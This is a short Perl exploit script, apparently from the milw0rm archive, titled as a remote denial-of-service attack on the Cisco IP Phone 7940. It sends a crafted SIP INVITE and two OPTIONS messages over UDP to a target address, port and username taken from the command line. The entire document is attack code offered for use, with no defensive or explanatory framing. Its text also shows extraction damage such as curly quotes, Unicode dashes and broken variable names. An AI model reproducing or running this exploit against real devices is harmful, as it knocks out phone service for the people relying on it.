1 #!/usr/bin/perl
2 use IO::Socket::INET;
3
4 die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
5
6
7
8 $socket=new IO::Socket::INET−>new(PeerPort=>$ARGV[1],
9
10 Proto=>’udp’,
11
12 PeerAddr=>$ARGV[0]);
13
14
15
16 $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=00\r\nTo: <sip:$AR
GV[2]\@$ARGV[0]>;tag=00\r\nCall−ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent−Length: 0\r\n\r\n";;
17
18 $socket−>send($msg);
19
20
21
22 sleep(1);
23
24 $msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=01\r\nTo: <sip:$AR
GV[2]\@$ARGV[0]>\r\nCall−ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent−Length: 0\r\n\r\n";
25
26 $socket−>send($msg);
27
28
29
30 sleep(1);
31
32 $msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=02\r\nTo: <sip:$AR
GV[2]\@$ARGV[0]>\r\nCall−ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent−Length: 0\r\n\r\n";
33
34 $socket−>send($msg);
35
36 # milw0rm.com [2007−08−21]
Page 1/1
Cisco IP Phone 7940 3 SIP messages Remote Denial of Service Exploit
MADYNES
08/21/2007